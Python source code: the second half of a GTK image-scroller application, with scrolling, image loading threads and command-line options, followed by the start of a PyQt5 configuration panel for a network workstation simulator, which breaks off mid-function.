        for n in range(dsp.get_n_monitors()):
            rct = dsp.get_monitor(n).get_geometry()
            mg = geom[f'M{n+1}'] = Pos(x=rct.x, y=rct.y, w=rct.width, h=rct.height)
            sg.w, sg.h = max(sg.w, mg.x + mg.w), max(sg.h, mg.y + mg.h)
        ww = wh = None
        if self.conf.win_w and self.conf.win_h:
            get_val = lambda v,k: int(v) if v.isdigit() else getattr(geom[v], k)
            ww, wh = get_val(self.conf.win_w, 'w'), get_val(self.conf.win_h, 'h')
            w.resize(ww, wh)
            self.log.debug('win-resize: {} {}', ww, wh)
        if self.conf.win_x or self.conf.win_y:
            if not (ww or wh): ww, wh = w.get_size()
            wx, wy = w.get_position()
            # NOTE(review): sg[k] subscripts a Pos dataclass, which has no
            # __getitem__ -- the negative-offset branch would raise; verify.
            get_pos = lambda v,k,wv: (
                (int(v[1:]) if v[0] != '-' else (sg[k] - wv - int(v[1:])))
                if v[0] in '+-' else getattr(geom[v], k) )
            if self.conf.win_x: wx = get_pos(self.conf.win_x, 'x', ww)
            if self.conf.win_y: wy = get_pos(self.conf.win_y, 'y', wh)
            self.log.debug('win-move: {} {}', wx, wy)
            w.move(wx, wy)

    # Lazily-built lookup tables for key handling (shared per-class).
    _key_sums = _key_masks = None
    def window_key(self, w, ev):
        '''Translate a key press into a "mod1 mod2 key" sum and run the bound action.'''
        if not self._key_masks:
            # Map Gdk modifier flag bits to their short names ("control", ...).
            self._key_masks = dict()
            for st, mod in Gdk.ModifierType.__flags_values__.items():
                if ( len(mod.value_names) != 1
                        or not mod.first_value_nick.endswith('-mask') ): continue
                assert st not in self._key_masks, [mod.first_value_nick, self._key_masks[st]]
                mod = mod.first_value_nick[:-5]
                if mod.startswith('modifier-reserved-'): mod = 'res-{}'.format(mod[18:])
                self._key_masks[st] = mod
        if not self._key_sums:
            # Map each action to its configured list of key-sum strings.
            self._key_sums = dict()
            for k, action in [
                    ('quit', 'q'), *((f'scroll_{k.name}', k) for k in ScrollAdjust) ]:
                self._key_sums[action] = list(filter( None,
                    map(str.strip, getattr(self.conf, f'keys_{k}').split(',')) ))
        chk, keyval = ev.get_keyval()
        if not chk: return
        key_sum, key_name = list(), Gdk.keyval_name(keyval)
        for st, mod in self._key_masks.items():
            if ev.state & st == st: key_sum.append(mod)
        key_sum = ' '.join(sorted(key_sum) + [key_name]).lower()
        self.log.debug('key-press-event: {!r}', key_sum)
        for action, key_sums in self._key_sums.items():
            if key_sum not in key_sums: continue
            if action == 'q': self.app.quit()
            elif isinstance(action, ScrollAdjust): self.scroll_adjust(action)

    def scroll_update(self, adj, offset=None, repeat=False):
        '''Advance scroll position, cycling images in/out past the preload threshold.'''
        self.ev_debounce_clear('scroll')
        pos_max = self.dim_box_alloc() - self.get_size()[self.dim_scroll_n]
        pos = self.dim_scroll_translate(adj.get_value(), pos_max)
        if offset:
            pos = pos + offset
            adj.set_value(self.dim_scroll_translate(pos, pos_max))
        # Only cycle once most queued images are actually displayed, to avoid
        # churning through images that never got rendered.
        if ( pos >= pos_max * self.conf.scroll_queue_preload_at
                and self.box_images and (
                    sum(bool(img.displayed) for img in self.box_images) / len(self.box_images)
                    > self.conf.scroll_queue_preload_at )):
            pos += self.image_cycle()
            adj.set_value(self.dim_scroll_translate(pos, pos_max))
        # Check is to avoid expensive updates/reloads while window is resized
        if not self.ev_debounce_is_set('set-pixbufs'): self.image_set_pixbufs()
        return repeat

    def image_cycle(self):
        'Adds/removes images and returns scroll position adjustment based on their size.'
        offset = offset_rev = 0
        image = ...
        while image is ... or len(self.box_images) < self.conf.scroll_queue_size:
            image = self.image_add()
            if not image: break
            if image.displayed: # delayed loading runs image_set_scroll on gtk event
                offset_rev += self.dim_scroll_for_image(image.gtk)
                offset_rev += self.conf.misc_box_spacing
        while len(self.box_images) > self.conf.scroll_queue_size:
            image = self.box_images.popleft()
            offset += self.dim_scroll_for_image(image.gtk)
            self.image_remove(image)
            offset += self.conf.misc_box_spacing
        offset = -(offset if not self.dim_scroll_rev else offset_rev)
        return offset

    def image_add(self):
        'Adds image and returns it, or returns None if there is nothing more to add.'
        for n in range(self.conf.image_open_attempts):
            try: p = next(self.src_paths_iter)
            except StopIteration: p = None
            if not p: return
            image = self.image_load(p)
            if image: break
        else:
            self.log.error( 'Failed to get new image'
                ' in {} attempt(s), giving up', self.conf.image_open_attempts )
            return
        self.dim_box_pack(image.gtk, False, False, 0)
        self.box_images.append(image)
        image.gtk.show()
        return image

    def image_remove(self, image):
        '''Detach and destroy the gtk widget of a dropped image.'''
        self.box.remove(image.gtk)
        image.gtk.destroy()

    def image_load(self, path):
        '''Create an Image for path; pixbuf is loaded sync unless helper module is used.
        Returns None on load failure.'''
        self.log.debug('Adding image: {}', path)
        image = Image(path=path, gtk=Gtk.Image())
        if not self.pp:
            try: image.pb_src = GdkPixbuf.Pixbuf.new_from_file(path)
            except Exception as err:
                self.log.error( 'Failed to create gdk-pixbuf'
                    ' from file: [{}] {}', err.__class__.__name__, err )
                return
        if self.conf.image_opacity < 1.0:
            image.gtk.set_opacity(self.conf.image_opacity)
        return image

    def image_set_pixbufs(self, *ev_args, init=False):
        'Must be called to set image widget contents to resized pixbufs'
        if self.box_images_init:
            # First run: pre-fill the queue before any scrolling happens.
            self.box_images_init, init = False, True
            init_sz = getattr(self.get_allocation(), self.dim_scroll) * 1.5
            for n in range(self.conf.scroll_queue_size): self.image_add()
        self.ev_debounce_clear('set-pixbufs')
        sz = getattr(self.get_allocation(), self.dim_scale)
        for image in list(self.box_images):
            if image.sz_chk == sz: continue # already scaled for this window size
            image.sz_chk = sz
            if image.pb_src: # simple sync processing with no helper module
                w, h = image.pb_src.get_width(), image.pb_src.get_height()
                w, h = ((sz, int(sz / (w / h))) if self.dim_scale_w else (int(sz * (w / h)), sz))
                pixbuf = image.pb_src.scale_simple(w, h, self.conf.image_scale_algo)
                image.gtk.set_from_pixbuf(pixbuf)
                image.displayed = True
            else: # background pixbuf_proc.so threads, except when init=True
                image.sz, image.pb_proc = sz, None
                log.debug('pixbuf_proc [{}]: {}', 'init' if init else 'queue', image.path)
                if init and init_sz > 0:
                    # Process enough images synchronously to fill ~1.5 window
                    # heights/widths so the initial view is not blank.
                    self.image_set_pixbuf_proc(image)
                    if image.pb_proc: init_sz -= self.dim_scroll_for_pixbuf(image.pb_proc)
                    self.thread_results.append(image)
                else: self.thread_queue.put_nowait(image)
        if init and self.pp: self.image_set_pixbuf_thread_cb()

    def image_set_pixbuf_proc(self, image):
        '''Run helper-module load/scale for image, storing result in image.pb_proc
        (False on failure).'''
        sz = image.sz
        w, h = ((sz, -1) if self.dim_scale_w else (-1, sz))
        try:
            buff, w, h, rs, alpha = self.pp.process_image_file(
                image.path, w, h, int(self.conf.image_scale_algo), self.conf.image_brightness )
        except self.pp.error as err:
            self.log.error('Failed to load/process image: {}', err)
            image.pb_proc = False
            return
        if image.sz != sz: return # was re-queued
        image.pb_proc = GdkPixbuf.Pixbuf\
            .new_from_data(buff, GdkPixbuf.Colorspace.RGB, alpha, 8, w, h, rs)

    def image_set_pixbuf_thread(self):
        '''Worker-thread loop: process queued images, notify main thread via signal.'''
        while True:
            image = self.thread_queue.get()
            log.debug('pixbuf_proc [thread]: {}', image.path)
            self.image_set_pixbuf_proc(image)
            self.thread_results.append(image)
            signal.pthread_kill(*self.thread_kill)

    def image_set_pixbuf_thread_cb(self):
        '''Main-thread (GLib) callback: apply processed pixbufs or drop failed images.'''
        # Note: these are only called in series by glib, and do not interrupt each other
        while True:
            try: image = self.thread_results.pop()
            except IndexError: break
            log.debug('pixbuf_proc [signal]: {}', image.path)
            if image.pb_proc is False:
                self.box_images.remove(image)
                self.image_remove(image)
            else:
                image.gtk.set_from_pixbuf(image.pb_proc)
                if self.dim_scroll_rev: # scroll pos will change when image is drawn
                    image.gtk.connect('size-allocate', ft.partial(self.image_set_scroll, image))
                image.pb_proc, image.displayed = None, True
        return True

    def image_set_scroll(self, image, w, ev):
        '''One-shot size-allocate handler compensating scroll position for a
        newly-drawn image when packing from the reverse end.'''
        if image.scrolled: return
        image.scrolled = True
        # This seem to cause some scroll-jumps, not sure why, maybe wrong gtk event?
        offset = self.scroll_adj.get_value()
        offset += self.dim_scroll_for_image(image.gtk)
        offset += self.conf.misc_box_spacing
        self.scroll_adj.set_value(offset)

    def scroll_adjust(self, adj):
        '''Start/stop/retune the auto-scroll timer per a ScrollAdjust action.'''
        px, s = self.conf.scroll_auto or (0, 0)
        adj_k = self.conf.scroll_adjust_k
        if adj is ScrollAdjust.toggle:
            if self.scroll_timer: px = s = 0 # pause
            elif not (px and s): px, s = self.conf._scroll_auto_key_start
            else: s += 1e-6 # just to trigger change check below
        elif adj is ScrollAdjust.faster:
            if not self.conf.scroll_auto: # just start with any parameters
                return self.scroll_adjust(ScrollAdjust.toggle)
            if s < 1/120: px *= adj_k # bump px jumps if it's >120fps already
            else: s /= adj_k
        elif adj is ScrollAdjust.slower:
            if px <= 1: px, s = 1, s * adj_k # bump interval instead of sub-px skips
            else: px /= adj_k
        if (px, s) == self.conf.scroll_auto:
            return log.warning(
                'Scroll-adjust BUG [{}]: [run={} speed={}] -> no changes!',
                adj.name, bool(self.scroll_timer), self.conf.scroll_auto )
        log.debug( 'Scroll-adjust [{}]: [run={} speed={}] -> [run={} speed={}]',
            adj.name, bool(self.scroll_timer), self.conf.scroll_auto, bool(px and s), (px, s) )
        if self.scroll_timer: GLib.source_remove(self.scroll_timer)
        if not (px and s): self.scroll_timer = None
        else:
            self.conf.scroll_auto = px, s
            self.scroll_timer = GLib.timeout_add(s * 1000, ft.partial(
                self.scroll_update, self.scroll_adj, offset=px, repeat=True ))
class ScrollerApp(Gtk.Application):
    '''Gtk application shell: creates a single ScrollerWindow on activation.'''

    def __init__(self, src_paths_iter, conf):
        self.src_paths_iter, self.conf = src_paths_iter, conf
        super().__init__()
        if self.conf.misc_app_id:
            # app-id may embed the pid to allow multiple instances.
            self.set_application_id(self.conf.misc_app_id.format(pid=os.getpid()))
        if self.conf.misc_no_session:
            self.set_property('register-session', False)

    def do_activate(self):
        window = ScrollerWindow(self, self.src_paths_iter, self.conf)
        window.connect('delete-event', lambda w, *data: self.quit())
        window.show_all()
def shuffle_iter(src_paths, crop_ratio=0.25):
    '''Yield all paths from src_paths in random order without repeats.

    Picked entries are tombstoned with None; once the used fraction reaches
    crop_ratio the pool is compacted to keep random picks efficient.'''
    pool = list(src_paths)
    used = 0
    while len(pool) > used:
        idx = random.randint(0, len(pool) - 1)
        path = pool[idx]
        if not path:  # tombstone (or falsy input entry) -- re-pick
            continue
        pool[idx] = None
        used += 1
        if used >= len(pool) * crop_ratio:
            pool = list(filter(None, pool))
            used = 0
        yield path
def loop_iter(src_paths_func):
    '''Endlessly re-invoke src_paths_func and yield each path it produces.'''
    while True:
        yield from src_paths_func()
def file_iter(src_paths):
    '''Recursively yield file paths (as strings) under each path in src_paths.

    Non-existent paths are logged and skipped; directories are walked
    recursively with every file yielded (no extension filtering).'''
    for path in map(pl.Path, src_paths):
        if not path.exists():
            # warning() replaces the deprecated Logger.warn() alias;
            # message grammar fixed ("does not exists" -> "does not exist").
            log.warning('Path does not exist: {}', path)
            continue
        if path.is_dir():
            for root, dirs, files in os.walk(str(path)):
                root = pl.Path(root)
                for fn in files:
                    yield str(root / fn)
        else:
            yield str(path)
def main(args=None, conf=None):
	'''CLI entry point: parse options into conf (ScrollerConf),
		build the image-path iterator and run the Gtk ScrollerApp.'''
	if not conf: conf = ScrollerConf()
	scale_algos = 'bilinear hyper nearest tiles'.split()

	import argparse

	class SmartHelpFormatter(argparse.HelpFormatter):
		# Keeps manually-formatted (multiline) help strings as-is,
		# word-wrapping only single-line ones.
		def __init__(self, *args, **kws):
			return super().__init__(*args, **kws, width=100)
		def _fill_text(self, text, width, indent):
			if '\n' not in text: return super()._fill_text(text, width, indent)
			return ''.join(indent + line for line in text.splitlines(keepends=True))
		def _split_lines(self, text, width):
			return ( super()._split_lines(text, width) if '\n' not in text
				else dedent(re.sub(r'(?<=\S)\t+', ' ', text)).replace('\t', ' ').splitlines() )

	parser = argparse.ArgumentParser(
		formatter_class=SmartHelpFormatter,
		description='Display image-scroller window.')

	group = parser.add_argument_group('Image sources')
	group.add_argument('image_path', nargs='*',
		help='''
			Path to file(s) or directories
				(will be searched recursively) to display images from.
			All found files will be treated as images,
				use e.g. find/grep/xargs for filename-based filtering.
			If no paths are provided, current
				directory is used by default. See also --file-list option.''')
	group.add_argument('-f', '--file-list', metavar='path',
		help='''
			File with a list of image files/dirs paths to use, separated by newlines.
			Can be a fifo or pipe, use "-" to read it from stdin.''')
	group.add_argument('-r', '--shuffle', action='store_true',
		help='''
			Read full list of input images
				(dont use infinite --file-list) and shuffle it.''')
	group.add_argument('-l', '--loop', action='store_true',
		help='''
			Loop (pre-buffered) input list of images infinitely.
			Will re-read any dirs in image_path on each loop cycle,
				and reshuffle files if -r/--shuffle is also specified.''')

	group = parser.add_argument_group('Image processing')
	group.add_argument('-z', '--scaling-interp',
		default=scale_algos[0], metavar='algo', help=f'''
			Interpolation algorithm to use to scale images to window size.
			Supported ones: {", ".join(scale_algos)}. Default: %(default)s.
			Can be specified by full name, prefix\
				(e.g. "h" for "hyper") or digit (1={scale_algos[0]}).''')
	group.add_argument('-b', '--brightness', type=float, metavar='float',
		help='''
			Adjust brightness of images before displaying them via HSP algorithm,
				multiplying P by specified coefficient value (>1 - brighter, <1 - darker).
			For more info on HSP, see http://alienryderflex.com/hsp.html
			Requires compiled pixbuf_proc.so module importable somewhere, e.g. same dir as script.''')
	group.add_argument('-m', '--proc-threads', type=int, metavar='n',
		help='''
			Number of background threads to use for loading and processing images.
			Requires pixbuf_proc.so module to be loaded if value is specified,
				and otherwise defaults to 0, which will translate to CPU thread count.''')

	group = parser.add_argument_group('Scrolling')
	group.add_argument('-d', '--scroll-direction', metavar='direction',
		help=f'''
			Direction for scrolling - left, right, up, down (can be specified by prefix, e.g. "r").
			This determines where scrollbar will be, how images will be scaled
				(either to window width or height), -a/--auto-scroll direction, as well as
				on which window side new images will be appended (when scrolling close to it).''')
	group.add_argument('-q', '--queue',
		metavar='count[:preload-thresh]',
		help=f'''
			Number of images scrolling through a window and at which position
				(0-1.0 with 0 being "top" and 1.0 "bottom") to pick/load/insert new images.
			Format is: count[:preload-theshold].
			Examples: 4:0.8, 10:0.5, 5:0.9. Default: {conf.scroll_queue_size}:{conf.scroll_queue_preload_at}''')
	group.add_argument('-a', '--auto-scroll', metavar='px[:interval]',
		help='''
			Auto-scroll by specified number
				of pixels with specified interval (1s by defaul).''')

	group = parser.add_argument_group('Appearance')
	group.add_argument('-o', '--opacity', type=float, metavar='0-1.0',
		help=f'''
			Opacity of the window contents - float value in 0-1.0 range,
				with 0 being fully-transparent and 1.0 fully opaque.
			Should only have any effect with compositing Window Manager.''')
	group.add_argument('-p', '--pos', metavar='(WxH)(+X)(+Y)',
		help='''
			Set window size and/or position hints for WM (usually followed).
			W/H values can be special "S" to use screen size,
				e.g. "SxS" (or just "S") is "fullscreen".
			X/Y offsets must be specified in that order, if at all, with positive
				values (prefixed with "+") meaning offset from top-left corner
				of the screen, and negative - bottom-right.
			Special values like "M1" (or M2, M3, etc) can
				be used to specify e.g. monitor-1 width/heigth/offsets,
				and if size is just "M1" or "M2", then x/y offsets default to that monitor too.
			If not specified (default), all are left for Window Manager to decide/remember.
			Examples: 800x600, -0+0 (move to top-right corner),
				S (full screen), 200xS+0, M2 (full monitor 2), M2+M1, M2x500+M1+524.
			"slop" tool - https://github.com/naelstrof/slop - can be used
				used to get this value interactively via mouse selection (e.g. "-p $(slop)").''')
	group.add_argument('-s', '--spacing', type=int, metavar='px',
		help=f'Padding between images, in pixels. Default: {conf.misc_box_spacing}px.')
	group.add_argument('-x', '--wm-hints', metavar='(+|-)hint(,...)',
		help='''
			Comma or space-separated list of WM hints to set/unset for the window.
			All of these can have boolean yes/no or unspecified/default values.
			Specifying hint name in the list will have it explicity set (i.e. "yes/true" value),
				and preceding name with "-" will have it explicitly unset instead ("no/false").
			List of recognized hints:
				{}.
			Example: keep_top -decorated skip_taskbar skip_pager -accept_focus.'''\
			.format('\n\t\t\t\t'.join(textwrap.wrap(', '.join(conf._win_hints_all), 75))))
	group.add_argument('-t', '--wm-type-hints', metavar='hint(,...)',
		help='''
			Comma or space-separated list of window type hints for WM.
			Similar to --wm-hints in general, but are
				combined separately to set window type hint value.
			List of recognized type-hints (all unset by default):
				{}.
			Probably does not make sense to use multiple of these at once.'''\
			.format('\n\t\t\t\t'.join(textwrap.wrap(', '.join(conf._win_type_hints_all), 75))))
	group.add_argument('-i', '--icon-name', metavar='icon',
		help='''
			Name of the XDG icon to use for the window.
			Can be icon from a theme, one of the default gtk ones, and such.
			See XDG standards for how this name gets resolved into actual file path.
			Example: image-x-generic.''')

	group = parser.add_argument_group('Configuration file options')
	group.add_argument('-c', '--conf',
		metavar='file', action='append',
		help=f'''
			Path of configuration file(s) to use.
			Can be specified mutliple times to use multiple config files,
				with values from the last one overriding earlier ones.
			{conf._conf_file_name} is looked up in XDG_CONFIG_* paths by default.''')
	group.add_argument('--conf-dump', action='store_true',
		help='Print all configuration settings, which will be used with'
			' currently detected (and/or specified) configuration file(s), and exit.')
	group.add_argument('--conf-dump-defaults', action='store_true',
		help='Print all default settings, which would be used'
			' if no configuration file(s) were overriding these, and exit.')

	group = parser.add_argument_group('Misc / debug')
	group.add_argument('-n', '--no-register-session', action='store_true',
		help='''
			Do not try register app with any session manager.
			Can be used to get rid of Gtk-WARNING messages
				about these and to avoid using dbus, but not sure how/if it actually works.''')
	group.add_argument('-u', '--unique', action='store_true',
		help='Force application uniqueness via GTK application_id.'
			' I.e. exit immediately if another app instance is already running.')
	group.add_argument('--dump-css', action='store_true',
		help='Print css that is used for windows by default and exit.')
	group.add_argument('--debug', action='store_true', help='Verbose operation mode.')

	opts = parser.parse_args(sys.argv[1:] if args is None else args)

	global log
	import logging
	logging.basicConfig(
		format='%(asctime)s :: %(levelname)s :: %(message)s',
		datefmt='%Y-%m-%d %H:%M:%S',
		level=logging.DEBUG if opts.debug else logging.WARNING )
	log = get_logger('main')

	if opts.conf_dump_defaults: return conf.pprint('Default configuration options')
	conf_user_paths = list(pl.Path(p).expanduser() for p in opts.conf or list())
	for p in conf_user_paths:
		if not os.access(p, os.R_OK):
			parser.error(f'Specified config file is missing or inaccessible: {p}')
	conf.update_from_files(*conf_user_paths)
	if opts.conf_dump: return conf.pprint('Current configuration file(s) options')
	if opts.dump_css: return print(conf._win_css.replace('\t', '  '), end='')

	src_paths = opts.image_path or list()
	if opts.file_list:
		if src_paths: parser.error('Either --file-list or image_path args can be specified, not both.')
		src_file = pl.Path(opts.file_list).open() if opts.file_list != '-' else sys.stdin
		src_paths = iter(lambda: src_file.readline().rstrip('\r\n').strip('\0'), '')
	elif not src_paths: src_paths.append('.')
	if opts.shuffle: random.seed()
	if opts.loop:
		src_func = lambda s=list(src_paths): file_iter(s)
		if opts.shuffle: src_func = lambda f=src_func: shuffle_iter(f())
		src_paths_iter = loop_iter(src_func)
	elif opts.shuffle: src_paths_iter = shuffle_iter(file_iter(src_paths))
	else: src_paths_iter = file_iter(src_paths)

	if opts.scaling_interp:
		algo = opts.scaling_interp.strip().lower()
		if algo not in scale_algos:
			if algo.isdigit():
				try: algo = scale_algos[int(algo) - 1]
				except IndexError: algo = None  # digit out of range
			else:
				for a in scale_algos:
					if not a.startswith(algo): continue
					algo = a
					break
				else: algo = None
		if not algo: parser.error(f'Unknown scaling interpolation value: {opts.scaling_interp}')
		opts.scaling_interp = algo

	if opts.auto_scroll or conf.scroll_auto:
		if opts.auto_scroll: conf.scroll_auto = opts.auto_scroll
		try: px, s = map(float, conf.scroll_auto.split(':', 1))
		except ValueError: px, s = float(conf.scroll_auto), 1
		conf.scroll_auto = px, s

	if opts.scroll_direction or conf.scroll_direction:
		if opts.scroll_direction: conf.scroll_direction = opts.scroll_direction
		v_chk = conf.scroll_direction.strip().lower()
		for v in ScrollDirection:
			if not v.name.startswith(v_chk): continue
			conf.scroll_direction = v
			break
		else: parser.error(f'Unrecognized -d/--scroll-direction value: {conf.scroll_direction}')

	if opts.pos or conf.win_pos:
		if opts.pos: conf.win_pos = opts.pos
		m = re.search(
			r'^((?:M?\d+|S)(?:x(?:M?\d+|S))?)?'
			r'([-+]M?\d+)?([-+]M?\d+)?$', conf.win_pos )
		if not m: parser.error(f'Invalid size/position spec: {conf.win_pos!r}')
		size, x, y = m.groups()
		# bugfix: size group is None for offset-only specs like "-0+0",
		# so guard before the "x" membership test to avoid a TypeError
		size_fs = size if size and 'x' not in size else None
		if size:
			if size_fs: size = f'{size}x{size}'
			conf.win_w, conf.win_h = size.split('x', 1)
		if x: conf.win_x = x
		if y: conf.win_y = y
		if size_fs and not (x or y): conf.win_x = conf.win_y = size_fs

	if opts.queue:
		try: qs, q_pos = opts.queue.split(':', 1)
		except ValueError: qs, q_pos = opts.queue, None
		if qs: conf.scroll_queue_size = int(qs)
		if q_pos: conf.scroll_queue_preload_at = float(q_pos)

	if opts.wm_hints or conf.win_hints:
		if opts.wm_hints: conf.win_hints = opts.wm_hints
		conf.win_hints = dict(
			(hint.lstrip('+-'), not hint.startswith('-'))
			for hint in conf.win_hints.replace(',', ' ').split() )
	if opts.wm_type_hints or conf.win_type_hints or True:
		# "or True" makes this branch unconditional, so NORMAL is always set as
		# the baseline type hint; guard against both hint sources being unset
		hints = opts.wm_type_hints or conf.win_type_hints or ''
		conf.win_type_hints = Gdk.WindowTypeHint.NORMAL
		for k in hints.replace(',', ' ').split():
			conf.win_type_hints |= conf._win_type_hints_all[k]

	conf.image_scale_algo = getattr(
		GdkPixbuf.InterpType, (opts.scaling_interp or conf.image_scale_algo).upper() )
	if opts.icon_name: conf.win_icon = opts.icon_name
	if opts.spacing is not None: conf.misc_box_spacing = opts.spacing
	if opts.opacity is not None: conf.image_opacity = opts.opacity
	if opts.brightness is not None:
		conf.image_brightness = opts.brightness
		if opts.brightness < 0: parser.error('-b/--brightness value must be >0')
	if opts.proc_threads is not None: conf.image_proc_threads = opts.proc_threads
	# store_true means this is always a bool, never None
	if opts.no_register_session is not None: conf.misc_no_session = opts.no_register_session
	if not opts.unique: conf.misc_app_id += '.pid-{pid}'

	try:
		import pixbuf_proc, threading, queue
		conf._image_proc_module = pixbuf_proc, threading, queue
	except ImportError:
		if conf.image_brightness != 1.0 or conf.image_proc_threads:
			parser.error( 'pixbuf_proc.so module cannot be loaded, but is required'
				' with these options - build it from pixbuf_proc.c in same repo as this script' )
	else:
		if not conf.image_proc_threads: conf.image_proc_threads = os.cpu_count()

	log.debug('Starting application...')
	ScrollerApp(src_paths_iter, conf).run()
if __name__ == '__main__':
	# Restore default SIGINT behavior so Ctrl+C kills the app immediately
	# instead of raising KeyboardInterrupt inside the Gtk main loop.
	signal.signal(signal.SIGINT, signal.SIG_DFL)
	sys.exit(main())
|
panelMain.py | # Qt
from PyQt5.Qt import pyqtSlot
# Basics
from threading import Thread, ThreadError
# Dependencies
from panel.workstations.panel_common import CommonWorkstation
from panel.workstations.panel_router import RouterConfiguration
from panel.workstations.panel_networks import NetworksConfiguration
from panel.common.CommonWidgets import *
# JSON generator
from common.generator_json import GeneratorJSON, LoaderJSON
from common.config import Config, compare_d_lists
# Main part of the software
import launcher
class PanelMain(QWidget):
    """Main window of the simulator GUI.

    Provides workstation creation, one configuration tab per workstation
    (plus a fixed "networks" tab at index 0), and save/load/verify actions
    for the simulation configuration.
    """

    def __init__(self):
        super(PanelMain, self).__init__()
        # Load available workstation types
        self.workstations_list = self.load_workstations_available()
        self.resize(QSize(1750, 900))
        self.setWindowTitle("SI Simulator V{}".format(Config.get_version()))
        self.set_layout()
        # Init networks config and the two default tabs (router + dns)
        self.network_configuration = NetworksConfiguration()
        init_router = RouterConfiguration("router")
        init_dns = CommonWorkstation("dns", "dns")
        self.multi_window.addTab(self.network_configuration, "networks")
        self.multi_window.addTab(init_router, "router")
        self.multi_window.addTab(init_dns, "dns")
        # Tab at index i+1 corresponds to self.active_configurations[i]
        self.active_configurations = [init_router, init_dns]
        self.j_gen = None        # GeneratorJSON of the last saved configuration
        self.main_thread = None  # thread running the simulation, if any
        self.connect_actions()

    def load_workstations_available(self):
        """ Get workstation types available for configuring a simulation
        :return: Workstation types
        :rtype: list
        """
        return Config.get_available_workstations()

    def set_layout(self):
        """ Build the main layout: creation row, tab area and action buttons """
        # Create main layout
        self.main_layout = QGridLayout(self)
        # Workstation creation area
        self.workstations_available = QComboBox()
        for workstation in self.workstations_list:
            self.workstations_available.addItem(workstation)
        self.workstations_available.setCurrentIndex(self.workstations_available.findText("workstation"))
        self.add_workstation = QPushButton("Add workstation")
        name_label = QLabel("Workstation name : ")
        self.workstation_name_value = QLineEdit()
        workstation_type_label = QLabel("Type:")
        # Workstations configuration area
        self.multi_window = QTabWidget()
        self.multi_window.setTabsClosable(True)
        self.main_layout.addWidget(name_label, 0, 0)
        self.main_layout.addWidget(self.workstation_name_value, 0, 1)
        self.main_layout.addWidget(workstation_type_label, 0, 3)
        self.main_layout.addWidget(self.workstations_available, 0, 4)
        self.main_layout.addWidget(self.add_workstation, 0, 5)
        self.main_layout.addWidget(self.multi_window, 2, 0, 1, 6)
        group_actions = QGroupBox("Simulation")
        group_layout = QGridLayout()
        self.launcher_button = QPushButton("Save configuration")
        group_layout.addWidget(self.launcher_button, 0, 0)
        self.loader_button = QPushButton("Load configuration")
        group_layout.addWidget(self.loader_button, 1, 0)
        self.check_configuration = QPushButton("Verify configuration")
        group_layout.addWidget(self.check_configuration, 2, 0)
        group_actions.setLayout(group_layout)
        self.main_layout.addWidget(group_actions, 3, 0, 1, 8)

    def connect_actions(self):
        """ Connect signals to dedicated functions """
        self.add_workstation.clicked.connect(self.add_selected_workstation)
        self.workstation_name_value.returnPressed.connect(self.add_selected_workstation)
        self.multi_window.currentChanged.connect(self.update_networks_list)
        self.launcher_button.clicked.connect(self.generate_configuration)
        self.loader_button.clicked.connect(self.load_configuration)
        self.check_configuration.clicked.connect(self.check_parameters)
        # Tab signal
        self.multi_window.tabCloseRequested.connect(self.close_tab)

    @pyqtSlot()
    def add_selected_workstation(self):
        """ Create a configuration tab for the workstation named in the text field """
        workstation = self.workstation_name_value.text()
        if workstation != "":
            # renamed from 'type' to avoid shadowing the builtin
            workstation_type = self.workstations_available.currentText()
            if workstation_type != "router":
                workstation_configuration = CommonWorkstation(workstation, workstation_type)
            else:
                workstation_configuration = RouterConfiguration(workstation)
            self.active_configurations.append(workstation_configuration)
            self.multi_window.addTab(workstation_configuration, workstation)
        else:
            PopUpWidget("Please enter a workstation name")

    @pyqtSlot()
    def update_networks_list(self):
        """ Propagate the current networks list (networks tab merged with
        router overrides) to every workstation tab """
        # Get networks basic configuration
        networks_list = self.network_configuration.get_configured_networks()
        networks_update = []
        # Update using configuration in router configurations
        for workstation in self.active_configurations:
            if workstation.workstation_type in ["router"]:
                networks_update += workstation.get_networks_list()
        # Compare lists to determine if networks configuration has been updated
        try:
            networks_list = compare_d_lists(networks_list, networks_update)
        except Exception:
            # narrowed from bare except; merge is best-effort by design
            pass
        for workstation in self.active_configurations:
            workstation.update_networks_list(networks_list)

    @pyqtSlot()
    def generate_configuration(self):
        """ Ask for a target directory and generate the simulation JSON files there """
        # File dialog : select target directory
        try:
            dial = QFileDialog()
            dial.setBaseSize(QSize(1480, 900))
            dial.setAcceptMode(dial.AcceptMode(1))
            directory = dial.getExistingDirectory(options=QFileDialog.DontUseNativeDialog)
            network_configuration = self.network_configuration.get_current_configuration()
            physic_configuration = [workstation.get_configuration()["physic"] for workstation in self.active_configurations]
            logic_configuration = [workstation.get_configuration()["logic"] for workstation in self.active_configurations]
            simulation_configuration = [workstation.get_simulation_configuration() for workstation in self.active_configurations]
            if directory not in [""]:
                # Generating json file
                self.j_gen = GeneratorJSON(
                    directory,
                    network_configuration,
                    physic_configuration,
                    logic_configuration,
                    simulation_configuration
                )
        except Exception:
            # narrowed from bare except; incomplete configurations are ignored
            # on purpose (best effort) so the UI stays alive
            pass

    @pyqtSlot()
    def start_simulation(self):
        """ Launch launcher.main in a background thread using the
        files generated by generate_configuration """
        if self.j_gen is not None:
            phy, logi, simu = self.j_gen.get_files_path()
            self.main_thread = Thread(target=launcher.main, args=(phy, logi,))
            try:
                self.main_thread.start()
            except ThreadError:
                raise

    @pyqtSlot()
    def interrupt_simulation(self):
        """ Stop the running simulation (not implemented yet) """
        if self.main_thread is not None:
            # It is not going to be easy as expected
            # self.main_thread.join()
            pass

    @staticmethod
    def _select_json_file():
        """ Open a file dialog and return the selected .json path, or None """
        path = openConfigFile()
        if path.split(".")[-1] not in ["json"] or path in [""]:
            return None
        return path

    @pyqtSlot()
    def load_configuration(self):
        """ Load physic, logic and simulation JSON files (asked in that order)
        and rebuild all configuration tabs from them """
        physic_config = self._select_json_file()
        if physic_config is None:
            return
        logic_config = self._select_json_file()
        if logic_config is None:
            return
        simulation_config = self._select_json_file()
        if simulation_config is None:
            return
        # Generating json file
        networks, workstations = LoaderJSON.load_physic_configuration(physic_config)
        logic = LoaderJSON.load_logic_configuration(logic_config)
        simu = LoaderJSON.load_simulation_configuration(simulation_config)
        self.multi_window.clear()
        self.network_configuration = NetworksConfiguration()
        self.network_configuration.set_configuration(networks)
        self.multi_window.addTab(self.network_configuration, "networks")
        self.active_configurations = []
        loaded_config = {}
        # Join dictionaries by hostnames
        for workstation in workstations:
            for l_workstation in logic:
                if workstation["hostname"] == l_workstation["hostname"]:
                    workstation.update(l_workstation)  # Add key actions to dictionary
            for simu_workstation in simu:
                if workstation["hostname"] == simu_workstation["hostname"]:
